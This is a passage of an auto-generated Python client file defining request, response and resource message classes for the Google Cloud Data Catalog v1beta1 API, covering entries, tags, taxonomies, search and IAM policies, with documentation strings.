the expression. """ description = _messages.StringField(1) expression = _messages.StringField(2) location = _messages.StringField(3) title = _messages.StringField(4) class GetIamPolicyRequest(_messages.Message): r"""Request message for `GetIamPolicy` method. Fields: options: OPTIONAL: A `GetPolicyOptions` object for specifying options to `GetIamPolicy`. This field is only used by Cloud IAM. """ options = _messages.MessageField('GetPolicyOptions', 1) class GetPolicyOptions(_messages.Message): r"""Encapsulates settings provided to GetIamPolicy. Fields: requestedPolicyVersion: Optional. The policy format version to be returned. Valid values are 0, 1, and 3. Requests specifying an invalid value will be rejected. Requests for policies with any conditional bindings must specify version 3. Policies without any conditional bindings may specify any valid value or leave the field unset. """ requestedPolicyVersion = _messages.IntegerField(1, variant=_messages.Variant.INT32) class GoogleCloudDatacatalogV1beta1BigQueryDateShardedSpec(_messages.Message): r"""Spec for a group of BigQuery tables with name pattern `[prefix]YYYYMMDD`. Context: https://cloud.google.com/bigquery/docs /partitioned-tables#partitioning_versus_sharding Fields: dataset: Output only. The Data Catalog resource name of the dataset entry the current table belongs to, for example, `projects/{project_id}/locati ons/{location}/entrygroups/{entry_group_id}/entries/{entry_id}`. shardCount: Output only. Total number of shards. tablePrefix: Output only. The table name prefix of the shards. The name of any given shard is `[table_prefix]YYYYMMDD`, for example, for shard `MyTable20180101`, the `table_prefix` is `MyTable`. """ dataset = _messages.StringField(1) shardCount = _messages.IntegerField(2) tablePrefix = _messages.StringField(3) class GoogleCloudDatacatalogV1beta1BigQueryTableSpec(_messages.Message): r"""Describes a BigQuery table. Enums: TableSourceTypeValueValuesEnum: Output only. The table source type. Fields: tableSourceType: Output only. The table source type. tableSpec: Spec of a BigQuery table. This field should only be populated if `table_source_type` is `BIGQUERY_TABLE`. viewSpec: Table view specification. This field should only be populated if `table_source_type` is `BIGQUERY_VIEW`. """ class TableSourceTypeValueValuesEnum(_messages.Enum): r"""Output only. The table source type. Values: TABLE_SOURCE_TYPE_UNSPECIFIED: Default unknown type. BIGQUERY_VIEW: Table view. BIGQUERY_TABLE: BigQuery native table. """ TABLE_SOURCE_TYPE_UNSPECIFIED = 0 BIGQUERY_VIEW = 1 BIGQUERY_TABLE = 2 tableSourceType = _messages.EnumField('TableSourceTypeValueValuesEnum', 1) tableSpec = _messages.MessageField('GoogleCloudDatacatalogV1beta1TableSpec', 2) viewSpec = _messages.MessageField('GoogleCloudDatacatalogV1beta1ViewSpec', 3) class GoogleCloudDatacatalogV1beta1ColumnSchema(_messages.Message): r"""Representation of a column within a schema. Columns could be nested inside other columns. Fields: column: Required. Name of the column. description: Optional. Description of the column. Default value is an empty string. mode: Optional. A column's mode indicates whether the values in this column are required, nullable, etc. Only `NULLABLE`, `REQUIRED` and `REPEATED` are supported. Default mode is `NULLABLE`. subcolumns: Optional. Schema of sub-columns. A column can have zero or more sub-columns. type: Required. Type of the column. """ column = _messages.StringField(1) description = _messages.StringField(2) mode = _messages.StringField(3) subcolumns = _messages.MessageField('GoogleCloudDatacatalogV1beta1ColumnSchema', 4, repeated=True) type = _messages.StringField(5) class GoogleCloudDatacatalogV1beta1Entry(_messages.Message): r"""Entry Metadata. A Data Catalog Entry resource represents another resource in Google Cloud Platform, such as a BigQuery dataset or a Cloud Pub/Sub topic. Clients can use the `linked_resource` field in the Entry resource to refer to the original resource ID of the source system. An Entry resource contains resource details, such as its schema. An Entry can also be used to attach flexible metadata, such as a Tag. Enums: TypeValueValuesEnum: The type of the entry. Fields: bigqueryDateShardedSpec: Specification for a group of BigQuery tables with name pattern `[prefix]YYYYMMDD`. Context: https://cloud.google.com/bigquery/docs/partitioned- tables#partitioning_versus_sharding. bigqueryTableSpec: Specification that applies to a BigQuery table. This is only valid on entries of type `TABLE`. description: Entry description, which can consist of several sentences or paragraphs that describe entry contents. Default value is an empty string. displayName: Display information such as title and description. A short name to identify the entry, for example, "Analytics Data - Jan 2011". Default value is an empty string. gcsFilesetSpec: Specification that applies to a Cloud Storage fileset. This is only valid on entries of type FILESET. linkedResource: Output only. The resource this metadata entry refers to. For Google Cloud Platform resources, `linked_resource` is the [full name of the resource](https://cloud.google.com/apis/design/resource_names#ful l_resource_name). For example, the `linked_resource` for a table resource from BigQuery is: * //bigquery.googleapis.com/projects/project Id/datasets/datasetId/tables/tableId name: The Data Catalog resource name of the entry in URL format. Example: * projects/{project_id}/locations/{location}/entryGroups/{entry_group_id }/entries/{entry_id} Note that this Entry and its child resources may not actually be stored in the location in this name. schema: Schema of the entry. An entry might not have any schema attached to it. sourceSystemTimestamps: Output only. Timestamps about the underlying Google Cloud Platform resource, not about this Data Catalog Entry. type: The type of the entry. """ class TypeValueValuesEnum(_messages.Enum): r"""The type of the entry. Values: ENTRY_TYPE_UNSPECIFIED: Default unknown type TABLE: Output only. The type of entry that has a GoogleSQL schema, including logical views. MODEL: Output only. The type of models. DATA_STREAM: Output only. An entry type which is used for streaming entries. Example: Cloud Pub/Sub topic. FILESET: Alpha feature. An entry type which is a set of files or objects. Example: Cloud Storage fileset. """ ENTRY_TYPE_UNSPECIFIED = 0 TABLE = 1 MODEL = 2 DATA_STREAM = 3 FILESET = 4 bigqueryDateShardedSpec = _messages.MessageField('GoogleCloudDatacatalogV1beta1BigQueryDateShardedSpec', 1) bigqueryTableSpec = _messages.MessageField('GoogleCloudDatacatalogV1beta1BigQueryTableSpec', 2) description = _messages.StringField(3) displayName = _messages.StringField(4) gcsFilesetSpec = _messages.MessageField('GoogleCloudDatacatalogV1beta1GcsFilesetSpec', 5) linkedResource = _messages.StringField(6) name = _messages.StringField(7) schema = _messages.MessageField('GoogleCloudDatacatalogV1beta1Schema', 8) sourceSystemTimestamps = _messages.MessageField('GoogleCloudDatacatalogV1beta1SystemTimestamps', 9) type = _messages.EnumField('TypeValueValuesEnum', 10) class GoogleCloudDatacatalogV1beta1EntryGroup(_messages.Message): r"""EntryGroup Metadata. An EntryGroup resource represents a logical grouping of zero or more Data Catalog Entry resources. Fields: dataCatalogTimestamps: Output only. Timestamps about this EntryGroup. Default value is empty timestamps. description: Entry group description, which can consist of several sentences or paragraphs that describe entry group contents. Default value is an empty string. displayName: A short name to identify the entry group, for example, "analytics data - jan 2011". Default value is an empty string. name: The resource name of the entry group in URL format. Example: * projects/{project_id}/locations/{location}/entryGroups/{entry_group_id} Note that this EntryGroup and its child resources may not actually be stored in the location in this name. """ dataCatalogTimestamps = _messages.MessageField('GoogleCloudDatacatalogV1beta1SystemTimestamps', 1) description = _messages.StringField(2) displayName = _messages.StringField(3) name = _messages.StringField(4) class GoogleCloudDatacatalogV1beta1ExportTaxonomiesResponse(_messages.Message): r"""Response message for ExportTaxonomies. Fields: taxonomies: List of taxonomies and policy tags in a tree structure. """ taxonomies = _messages.MessageField('GoogleCloudDatacatalogV1beta1SerializedTaxonomy', 1, repeated=True) class GoogleCloudDatacatalogV1beta1FieldType(_messages.Message): r"""A GoogleCloudDatacatalogV1beta1FieldType object. Enums: PrimitiveTypeValueValuesEnum: Represents primitive types - string, bool etc. Fields: enumType: Represents an enum type. primitiveType: Represents primitive types - string, bool etc. """ class PrimitiveTypeValueValuesEnum(_messages.Enum): r"""Represents primitive types - string, bool etc. Values: PRIMITIVE_TYPE_UNSPECIFIED: This is the default invalid value for a type. DOUBLE: A double precision number. STRING: An UTF-8 string. BOOL: A boolean value. TIMESTAMP: A timestamp. """ PRIMITIVE_TYPE_UNSPECIFIED = 0 DOUBLE = 1 STRING = 2 BOOL = 3 TIMESTAMP = 4 enumType = _messages.MessageField('GoogleCloudDatacatalogV1beta1FieldTypeEnumType', 1) primitiveType = _messages.EnumField('PrimitiveTypeValueValuesEnum', 2) class GoogleCloudDatacatalogV1beta1FieldTypeEnumType(_messages.Message): r"""A GoogleCloudDatacatalogV1beta1FieldTypeEnumType object. Fields: allowedValues: Required on create; optional on update. The set of allowed values for this enum. This set must not be empty, the display names of the values in this set must not be empty and the display names of the values must be case-insensitively unique within this set. Currently, enum values can only be added to the list of allowed values. Deletion and renaming of enum values are not supported. Can have up to 500 allowed values. """ allowedValues = _messages.MessageField('GoogleCloudDatacatalogV1beta1FieldTypeEnumTypeEnumValue', 1, repeated=True) class GoogleCloudDatacatalogV1beta1FieldTypeEnumTypeEnumValue(_messages.Message): r"""A GoogleCloudDatacatalogV1beta1FieldTypeEnumTypeEnumValue object. Fields: displayName: Required. The display name of the enum value. Must not be an empty string. """ displayName = _messages.StringField(1) class GoogleCloudDatacatalogV1beta1GcsFileSpec(_messages.Message): r"""Specifications of a single file in Cloud Storage. Fields: filePath: Required. The full file path. Example: `gs://bucket_name/a/b.txt`. gcsTimestamps: Output only. Timestamps about the Cloud Storage file. sizeBytes: Output only. The size of the file, in bytes. """ filePath = _messages.StringField(1) gcsTimestamps = _messages.MessageField('GoogleCloudDatacatalogV1beta1SystemTimestamps', 2) sizeBytes = _messages.IntegerField(3) class GoogleCloudDatacatalogV1beta1GcsFilesetSpec(_messages.Message): r"""Describes a Cloud Storage fileset entry. Fields: filePatterns: Required. Patterns to identify a set of files in Google Cloud Storage. See [Cloud Storage documentation](/storage/docs/gsutil/addlhelp/WildcardNames) for more information. Note that bucket wildcards are currently not supported. Examples of valid file_patterns: * `gs://bucket_name/dir/*`: matches all files within `bucket_name/dir` directory. * `gs://bucket_name/dir/**`: matches all files in `bucket_name/dir` spanning all subdirectories. * `gs://bucket_name/file*`: matches files prefixed by `file` in `bucket_name` * `gs://bucket_name/??.txt`: matches files with two characters followed by `.txt` in `bucket_name` * `gs://bucket_name/[aeiou].txt`: matches files that contain a single vowel character followed by `.txt` in `bucket_name` * `gs://bucket_name/[a-m].txt`: matches files that contain `a`, `b`, ... or `m` followed by `.txt` in `bucket_name` * `gs://bucket_name/a/*/b`: matches all files in `bucket_name` that match `a/*/b` pattern, such as `a/c/b`, `a/d/b` * `gs://another_bucket/a.txt`: matches `gs://another_bucket/a.txt` You can combine wildcards to provide more powerful matches, for example: * `gs://bucket_name/[a-m]??.j*g` sampleGcsFileSpecs: Output only. Sample files contained in this fileset, not all files contained in this fileset are represented here. """ filePatterns = _messages.StringField(1, repeated=True) sampleGcsFileSpecs = _messages.MessageField('GoogleCloudDatacatalogV1beta1GcsFileSpec', 2, repeated=True) class GoogleCloudDatacatalogV1beta1ImportTaxonomiesRequest(_messages.Message): r"""Request message for ImportTaxonomies. Fields: inlineSource: Inline source used for taxonomies import """ inlineSource = _messages.MessageField('GoogleCloudDatacatalogV1beta1InlineSource', 1) class GoogleCloudDatacatalogV1beta1ImportTaxonomiesResponse(_messages.Message): r"""Response message for ImportTaxonomies. Fields: taxonomies: Taxonomies that were imported. """ taxonomies = _messages.MessageField('GoogleCloudDatacatalogV1beta1Taxonomy', 1, repeated=True) class GoogleCloudDatacatalogV1beta1InlineSource(_messages.Message): r"""Inline source used for taxonomies import. Fields: taxonomies: Required. Taxonomies to be imported. """ taxonomies = _messages.MessageField('GoogleCloudDatacatalogV1beta1SerializedTaxonomy', 1, repeated=True) class GoogleCloudDatacatalogV1beta1ListPolicyTagsResponse(_messages.Message): r"""Response message for ListPolicyTags. Fields: nextPageToken: Token used to retrieve the next page of results, or empty if there are no more results in the list. policyTags: The policy tags that are in the requested taxonomy. """ nextPageToken = _messages.StringField(1) policyTags = _messages.MessageField('GoogleCloudDatacatalogV1beta1PolicyTag', 2, repeated=True) class GoogleCloudDatacatalogV1beta1ListTagsResponse(_messages.Message): r"""Response message for ListTags. Fields: nextPageToken: Token to retrieve the next page of results. It is set to empty if no items remain in results. tags: Tag details. """ nextPageToken = _messages.StringField(1) tags = _messages.MessageField('GoogleCloudDatacatalogV1beta1Tag', 2, repeated=True) class GoogleCloudDatacatalogV1beta1ListTaxonomiesResponse(_messages.Message): r"""Response message for ListTaxonomies. Fields: nextPageToken: Token used to retrieve the next page of results, or empty if there are no more results in the list. taxonomies: Taxonomies that the project contains. """ nextPageToken = _messages.StringField(1) taxonomies = _messages.MessageField('GoogleCloudDatacatalogV1beta1Taxonomy', 2, repeated=True) class GoogleCloudDatacatalogV1beta1PolicyTag(_messages.Message): r"""Denotes one policy tag in a taxonomy (e.g. ssn). Policy Tags can be defined in a hierarchy. For example, consider the following hierachy: Geolocation -&gt; (LatLong, City, ZipCode). PolicyTag "Geolocation" contains three child policy tags: "LatLong", "City", and "ZipCode". Fields: childPolicyTags: Output only. Resource names of child policy tags of this policy tag. description: Description of this policy tag. It must: contain only unicode characters, tabs, newlines, carriage returns and page breaks; and be at most 2000 bytes long when encoded in UTF-8. If not set, defaults to an empty description. If not set, defaults to an empty description. displayName: Required. User defined name of this policy tag. It must: be unique within the parent taxonomy; contain only unicode letters, numbers, underscores, dashes and spaces; not start or end with spaces; and be at most 200 bytes long when encoded in UTF-8. name: Output only. Resource name of this policy tag, whose format is: "pro jects/{project_number}/locations/{location_id}/taxonomies/{taxonomy_id}/ policyTags/{id}". parentPolicyTag: Resource name of this policy tag's parent policy tag (e.g. for the "LatLong" policy tag in the example above, this field contains the resource name of the "Geolocation" policy tag). If empty, it means this policy tag is a top level policy tag (e.g. this field is empty for the "Geolocation" policy tag in the example above). If not set, defaults to an empty string. """ childPolicyTags = _messages.StringField(1, repeated=True) description = _messages.StringField(2) displayName = _messages.StringField(3) name = _messages.StringField(4) parentPolicyTag = _messages.StringField(5) class GoogleCloudDatacatalogV1beta1RenameTagTemplateFieldRequest(_messages.Message): r"""Request message for RenameTagTemplateField. Fields: newTagTemplateFieldId: Required. The new ID of this tag template field. For example, `my_new_field`. """ newTagTemplateFieldId = _messages.StringField(1) class GoogleCloudDatacatalogV1beta1Schema(_messages.Message): r"""Represents a schema (e.g. BigQuery, GoogleSQL, Avro schema). Fields: columns: Required. Schema of columns. A maximum of 10,000 columns and sub- columns can be specified. """ columns = _messages.MessageField('GoogleCloudDatacatalogV1beta1ColumnSchema', 1, repeated=True) class GoogleCloudDatacatalogV1beta1SearchCatalogRequest(_messages.Message): r"""Request message for SearchCatalog. Fields: orderBy: Specifies the ordering of results, currently supported case- sensitive choices are: * `relevance`, only supports desecending * `last_access_timestamp [asc|desc]`, defaults to descending if not specified * `last_modified_timestamp [asc|desc]`, defaults to descending if not specified If not specified, defaults to `relevance` descending. pageSize: Number of results in the search page. If <=0 then defaults to 10. Max limit for page_size is 1000. Throws an invalid argument for page_size > 1000. pageToken: Optional. Pagination token returned in an earlier SearchCatalogResponse.next_page_token, which indicates that this is a continuation of a prior SearchCatalogRequest call, and that the system should return the next page of data. If empty, the first page is returned. query: Required. The query string in search query syntax. The query must be non-empty. Query strings can be simple as "x" or more qualified as: * name:x * column:x * description:y Note: Query tokens need to have a minimum of 3 characters for substring matching to work correctly. See [Data Catalog Search Syntax](/data-catalog/docs/how-to/search-reference) for more information. scope: Required. The scope of this search request. """ orderBy = _messages.StringField(1) pageSize = _messages.IntegerField(2, variant=_messages.Variant.INT32) pageToken = _messages.StringField(3) query = _messages.StringField(4) scope = _messages.MessageField('GoogleCloudDatacatalogV1beta1SearchCatalogRequestScope', 5) class GoogleCloudDatacatalogV1beta1SearchCatalogRequestScope(_messages.Message): r"""A GoogleCloudDatacatalogV1beta1SearchCatalogRequestScope object. Fields: includeGcpPublicDatasets: If `true`, include Google Cloud Platform (GCP) public datasets in the search results. Info on GCP public datasets is available at https://cloud.google.com/public-datasets/. By default, GCP public datasets are excluded. includeOrgIds: Data Catalog tries to automatically choose the right corpus of data to search through. You can ensure an organization is included by adding it to `include_org_ids`. You can ensure a project's org is included with `include_project_ids`. You must specify at least one organization using `include_org_ids` or `include_project_ids` in all search requests. List of organization IDs to search within. To find your organization ID, follow instructions in https://cloud.google.com /resource-manager/docs/creating-managing-organization. includeProjectIds: List of project IDs to search within. To learn more about the distinction between project names/IDs/numbers, go to https://cloud.google.com/docs/overview/#projects. """ includeGcpPublicDatasets = _messages.BooleanField(1) includeOrgIds = _messages.StringField(2, repeated=True) includeProjectIds = _messages.StringField(3, repeated=True) class GoogleCloudDatacatalogV1beta1SearchCatalogResponse(_messages.Message): r"""Response message for SearchCatalog. Fields: nextPageToken: The token that can be used to retrieve the next page of results. results: Search results. """ nextPageToken = _messages.StringField(1) results = _messages.MessageField('GoogleCloudDatacatalogV1beta1SearchCatalogResult', 2, repeated=True) class GoogleCloudDatacatalogV1beta1SearchCatalogResult(_messages.Message): r"""A result that appears in the response of a search request. Each result captures details of one entry that matches the search. Enums: SearchResultTypeValueValuesEnum: Type of the search result. This field can be used to determine which Get method to call to fetch the full resource. Fields: linkedResource: The full name of the cloud resource the entry belongs to. See: https://cloud.google.com/apis/design/resource_names#full_resource_name. Example: * `//bigquery.googleapis.com/projects/projectId/datasets/data setId/tables/tableId` relativeResourceName: The relative resource name of the resource in URL format. Examples: * `projects/{project_id}/locations/{location_id}/ent ryGroups/{entry_group_id}/entries/{entry_id}` * `projects/{project_id}/tagTemplates/{tag_template_id}` searchResultSubtype: Sub-type of the search result. This is a dot- delimited description of the resource's full type, and is the same as the value callers would provide in the "type" search facet. Examples: `entry.table`, `entry.dataStream`, `tagTemplate`. searchResultType: Type of the search result. This field can be used to determine which Get method to call to fetch the full resource. """ class SearchResultTypeValueValuesEnum(_messages.Enum): r"""Type of the search result. This field can be used to determine which Get method to call to fetch the full resource. Values: SEARCH_RESULT_TYPE_UNSPECIFIED: Default unknown type. ENTRY: An Entry. TAG_TEMPLATE: A TagTemplate. ENTRY_GROUP: An EntryGroup. """ SEARCH_RESULT_TYPE_UNSPECIFIED = 0 ENTRY = 1 TAG_TEMPLATE = 2 ENTRY_GROUP = 3 linkedResource = _messages.StringField(1) relativeResourceName = _messages.StringField(2) searchResultSubtype = _messages.StringField(3) searchResultType = _messages.EnumField('SearchResultTypeValueValuesEnum', 4) class GoogleCloudDatacatalogV1beta1SerializedPolicyTag(_messages.Message): r"""Message representing one policy tag when exported as a nested proto. Fields: childPolicyTags: Children of the policy tag if any. description: Description of the serialized policy tag. The length of the description is limited to 2000 bytes when encoded in UTF-8. If not set, defaults to an empty description. displayName: Required. Display name of the policy tag. Max 200 bytes when encoded in UTF-8. """ childPolicyTags = _messages.MessageField('GoogleCloudDatacatalogV1beta1SerializedPolicyTag', 1, repeated=True) description = _messages.StringField(2) displayName = _messages.StringField(3) class GoogleCloudDatacatalogV1beta1SerializedTaxonomy(_messages.Message): r"""Message capturing a taxonomy and its policy tag hierarchy as a nested proto. Used for taxonomy import/export and mutation. Fields: description: Description of the serialized taxonomy. The length of the description is limited to 2000 bytes when encoded in UTF-8. If not set, defaults to an empty description. displayName: Required. Display name of the taxonomy. Max 200 bytes when encoded in UTF-8. policyTags: Top level policy tags associated with the taxonomy if any. """ description = _messages.StringField(1) displayName = _messages.StringField(2) policyTags = _messages.MessageField('GoogleCloudDatacatalogV1beta1SerializedPolicyTag', 3, repeated=True) class GoogleCloudDatacatalogV1beta1SystemTimestamps(_messages.Message): r"""Timestamps about this resource according to a particular system. Fields: createTime: The creation time of the resource within the given system. expireTime: Output only. The expiration time of the resource within the given system. Currently only apllicable to BigQuery resources. updateTime: The last-modified time of the resource within the given system. """ createTime = _messages.StringField(1) expireTime = _messages.StringField(2) updateTime = _messages.StringField(3) class GoogleCloudDatacatalogV1beta1TableSpec(_messages.Message): r"""Normal BigQuery table spec. Fields: groupedEntry: Output only. If the table is a dated shard, i.e., with name pattern `[prefix]YYYYMMDD`, `grouped_entry` is the Data Catalog resource name of the date sharded grouped entry, for example, `projects/{project_ id}/locations/{location}/entrygroups/{entry_group_id}/entries/{entry_id} `. Otherwise, `grouped_entry` is empty. """ groupedEntry = _messages.StringField(1) class GoogleCloudDatacatalogV1beta1Tag(_messages.Message): r"""Tags are used to attach custom metadata to Data Catalog resources. Tags conform to the specifications within their tag template. See [Data Catalog IAM](/data-catalog/docs/concepts/iam) for information on the permissions needed to create or view tags. Messages: FieldsValue: Required. This maps the ID of a tag field to the value of and additional information about that field. Valid field IDs are defined by the tag's template. A tag must have at least 1 field and at most 500 fields. Fields: column: Resources like Entry can have schemas associated with them. This scope allows users to attach tags to an individual column based on that schema. For attaching a tag to a nested column, use `.` to separate the column names. Example: * `outer_column.inner_column` fields: Required. This maps the ID of a tag field to the value of and additional information about that field. Valid field IDs are defined by the tag's template. A tag must have at least 1 field and at most 500 fields. name: The resource name of the tag in URL format. Example: * projects/{pr oject_id}/locations/{location}/entrygroups/{entry_group_id}/entries/{ent ry_id}/tags/{tag_id} where `tag_id` is a system-generated identifier. Note that this Tag may not actually be stored in the location in this name. template: Required. The resource name of the tag template that this tag uses. Example: * projects/{project_id}/locations/{location}/tagTemplate s/{tag_template_id} This field cannot be modified after creation. templateDisplayName: Output only. The display name of the tag template. """ @encoding.MapUnrecognizedFields('additionalProperties') class FieldsValue(_messages.Message): r"""Required. This maps the ID of a tag field to the value of and additional information about that field. Valid field IDs are defined by the tag's template. A tag must have at least 1 field and at most 500 fields. Messages: AdditionalProperty: An additional property for a FieldsValue object. Fields: additionalProperties: Additional properties of type FieldsValue """ class AdditionalProperty(_messages.Message): r"""An additional property for a FieldsValue object. Fields: key: Name of the additional property. value: A GoogleCloudDatacatalogV1beta1TagField attribute. """ key = _messages.StringField(1) value = _messages.MessageField('GoogleCloudDatacatalogV1beta1TagField', 2) additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True) column = _messages.StringField(1) fields = _messages.MessageField('FieldsValue', 2) name = _messages.StringField(3) template = _messages.StringField(4) templateDisplayName = _messages.StringField(5) class GoogleCloudDatacatalogV1beta1TagField(_messages.Message): r"""Contains the value and supporting information for a field within a Tag. Fields: boolValue: Holds the value for a tag field with boolean type. displayName: Output only. The display name of this field. doubleValue: Holds the value for a tag field with double type. enumValue: Holds the value for a tag field with enum type. This value must be one of the allowed values in the definition of this enum. stringValue: Holds the value for a tag field with string type. timestampValue: Holds the value for a tag field with timestamp type. """ boolValue = _messages.BooleanField(1) displayName = _messages.StringField(2) doubleValue = _messages.FloatField(3) enumValue = _messages.MessageField('GoogleCloudDatacatalogV1beta1TagFieldEnumValue', 4) stringValue = _messages.StringField(5) timestampValue = _messages.StringField(6) class GoogleCloudDatacatalogV1beta1TagFieldEnumValue(_messages.Message): r"""Holds an enum value. Fields: displayName: The display name of the enum value. """ displayName = _messages.StringField(1) class GoogleCloudDatacatalogV1beta1TagTemplate(_messages.Message): r"""A tag template defines a tag, which can have one or more typed fields. The template is used to create and attach the tag to GCP resources. [Tag template roles](/iam/docs/understanding-roles#data-catalog-roles) provide permissions to create, edit, and use the template (see, for example, the [TagTemplate User](/data-catalog/docs/how-to/template-user) role, which includes permission to use the tag template to tag resources. Messages: FieldsValue: Required. Map of tag template field IDs to the settings for the field. This map is an exhaustive list of the allowed fields. This map must contain at least one field and at most 500 fields. The keys to this map are tag template field IDs. Field IDs can contain letters (both uppercase and lowercase), numbers (0-9) and underscores (_). Field IDs must be at least 1 character long and at most 64 characters long. Field IDs must start with a letter or underscore. Fields: displayName: The display name for this template. Defaults to an empty string. fields: Required. Map of tag template field IDs to the settings for the field. This map is an exhaustive list of the allowed fields. This map must contain at least one field and at most 500 fields. The keys to this map are tag template field IDs. Field IDs can contain letters (both uppercase and lowercase), numbers (0-9) and underscores (_). Field IDs must be at least 1 character long and at most 64 characters long. Field IDs must start with a letter or underscore. name: The resource name of the tag template in URL format. Example: * projects/{project_id}/locations/{location}/tagTemplates/{tag_template_id } Note that this TagTemplate and its child resources may not actually be stored in the location in this name. """ @encoding.MapUnrecognizedFields('additionalProperties') class FieldsValue(_messages.Message): r"""Required. Map of tag template field IDs to the settings for the field. This map is an exhaustive list of the allowed fields. This map must contain at least one field and at most 500 fields. The keys to this map are tag template field IDs. Field IDs can contain letters (both uppercase and lowercase), numbers (0-9) and underscores (_). Field IDs must be at least 1 character long and at most 64 characters long. Field IDs must start with a letter or underscore. Messages: AdditionalProperty: An additional property for a FieldsValue object. Fields: additionalProperties: Additional properties of type FieldsValue """ class AdditionalProperty(_messages.Message): r"""An additional property for a FieldsValue object. Fields: key: Name of the additional property. value: A GoogleCloudDatacatalogV1beta1TagTemplateField attribute. """ key = _messages.StringField(1) value = _messages.MessageField('GoogleCloudDatacatalogV1beta1TagTemplateField', 2) additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True) displayName = _messages.StringField(1) fields = _messages.MessageField('FieldsValue', 2) name = _messages.StringField(3) class GoogleCloudDatacatalogV1beta1TagTemplateField(_messages.Message): r"""The template for an individual field within a tag template. Fields: displayName: The display name for this field. Defaults to an empty string. isRequired: Whether this is a required field. Defaults to false. name: Output only. The resource name of the tag template field in URL format. Example: * projects/{project_id}/locations/{location}/tagTempla tes/{tag_template}/fields/{field} Note that this TagTemplateField may not actually be stored in the location in this name. type: Required. The type of value this tag field can contain. """ displayName = _messages.StringField(1) isRequired = _messages.BooleanField(2) name = _messages.StringField(3) type = _messages.MessageField('GoogleCloudDatacatalogV1beta1FieldType', 4) class GoogleCloudDatacatalogV1beta1Taxonomy(_messages.Message): r"""A taxonomy is a collection of policy tags that classify data along a common axis. For instance a data *sensitivity* taxonomy could contain policy tags denoting PII such as age, zipcode, and SSN. A data *origin* taxonomy could contain policy tags to distinguish user data, employee data, partner data, public data. Enums: ActivatedPolicyTypesValueListEntryValuesEnum: Fields: activatedPolicyTypes: Optional. A list of policy types that are activated for this taxonomy. If not set, defaults to an empty list. description: Optional. Description of this taxonomy. It must: contain only unicode characters, tabs, newlines, carriage returns and page breaks; and be at most 2000 bytes long when encoded in UTF-8. If not set, defaults to an empty description. displayName: Required. User defined name of this taxonomy. It must: contain only unicode letters, numbers, underscores, dashes and spaces; not start or end with spaces; and be at most 200 bytes long when encoded in UTF-8. name: Output only. Resource name of this taxonomy, whose format is: "projects/{project_number}/locations/{location_id}/taxonomies/{id}". """ class ActivatedPolicyTypesValueListEntryValuesEnum(_messages.Enum): r"""ActivatedPolicyTypesValueListEntryValuesEnum enum type. Values: POLICY_TYPE_UNSPECIFIED: <no description> FINE_GRAINED_ACCESS_CONTROL: <no description> """ POLICY_TYPE_UNSPECIFIED = 0 FINE_GRAINED_ACCESS_CONTROL = 1 activatedPolicyTypes = _messages.EnumField('ActivatedPolicyTypesValueListEntryValuesEnum', 1, repeated=True) description = _messages.StringField(2) displayName = _messages.StringField(3) name = _messages.StringField(4) class GoogleCloudDatacatalogV1beta1ViewSpec(_messages.Message): r"""Table view specification. Fields: viewQuery: Output only. The query that defines the table view. """ viewQuery = _messages.StringField(1) class Policy(_messages.Message): r"""An Identity and Access Management (IAM) policy, which specifies access controls for Google Cloud resources. A `Policy` is a collection of `bindings`. A `binding` binds one or more `members` to a single `role`. Members can be user accounts, service accounts, Google groups, and domains (such as G Suite). A `role` is a named list of permissions; each `role` can be an IAM predefined role or a user-created custom role. Optionally, a `binding` can specify a `condition`, which is a logical expression that allows access to a resource only if the expression evaluates to `true`. A condition can add constraints based on attributes of the request, the resource, or both. **JSON example:** { "bindings": [ { "role": "roles/resourcemanager.organizationAdmin", "members": [ "user:[email protected]", "group:[email protected]", "domain:google.com", "serviceAccount:my-project- [email protected]" ] }, { "role": "roles/resourcemanager.organizationViewer", "members": ["user:[email protected]"], "condition": { "title": "expirable access", "description": "Does not grant access after Sep 2020", "expression": "request.time < timestamp('2020-10-01T00:00:00.000Z')", } } ], "etag": "BwWWja0YfJA=", "version": 3 } **YAML example:** bindings: - members: - user:[email protected] - group:[email protected] - domain:google.com - serviceAccount :[email protected] role: roles/resourcemanager.organizationAdmin - members: - user:[email protected] role: roles/resourcemanager.organizationViewer condition: title: expirable access description: Does not grant access after Sep 2020 expression: request.time < timestamp('2020-10-01T00:00:00.000Z') - etag: BwWWja0YfJA= - version: 3 For a description of IAM and its features, see the [IAM documentation](https://cloud.google.com/iam/docs/). Fields: bindings: Associates a list of `members` to a `role`. Optionally, may specify a `condition` that determines how and when the `bindings` are applied. Each of the `bindings` must contain at least one member. etag: `etag` is used for optimistic concurrency control as a way to help prevent simultaneous updates of a policy from overwriting each other. It is strongly suggested that systems make use of the `etag` in the read- modify-write cycle to perform policy updates in order to avoid race conditions: An `etag` is returned in the response to `getIamPolicy`, and systems are expected to put that etag in the request to `setIamPolicy` to ensure that their change will be applied to the same version of the policy. **Important:** If you use IAM Conditions, you must include the `etag` field whenever you call `setIamPolicy`. If you omit this field, then IAM allows you to overwrite a version `3` policy with a version `1` policy, and all of the conditions in the version `3` policy are lost. version: Specifies the format of the policy. Valid values are `0`, `1`, and `3`. Requests that specify an invalid value are rejected. Any operation that affects conditional role bindings must specify version `3`. This requirement applies to the following operations: * Getting a policy that includes a conditional role binding * Adding a conditional role binding to a policy * Changing a conditional role binding in a policy * Removing any role binding, with or without a condition, from a policy that includes conditions **Important:** If you use IAM Conditions, you must include the `etag` field whenever you call `setIamPolicy`. If you omit this field, then IAM allows you to overwrite a version `3` policy with a version `1` policy, and all of the conditions in the version `3` policy are lost. If a policy does not include any conditions, operations on that policy may specify any valid version or leave the field unset. """ bindings = _messages.MessageField('Binding', 1, repeated=True) etag = _messages.BytesField(2) version = _messages.IntegerField(3, variant=_messages.Variant.INT32) class SetIamPolicyRequest(_messages.Message): r"""Request message for `SetIamPolicy` method. Fields: policy: REQUIRED: The complete policy to be applied to the `resource`. The size of the policy is limited to a few 10s of KB. An empty policy is a valid policy but certain Cloud Platform services (such as Projects) might reject them. """ policy = _messages.MessageField('Policy', 1) class StandardQueryParameters(_messages.Message): r"""Query parameters accepted by all methods. Enums: FXgafvValueValuesEnum: V1 error format. AltValueValuesEnum: Data format for response. Fields: f__xgafv: V1 error format. access_token: OAuth access token. alt: Data format for response. callback: JSONP fields: Selector specifying which fields to include in a partial response. key: API key. Your API key identifies your project and provides you with API access, quota, and reports. Required unless you provide an OAuth 2.0 token. oauth_token: OAuth 2.0 token for the current user. prettyPrint: Returns response with indentations and line breaks. quotaUser: Available to use for 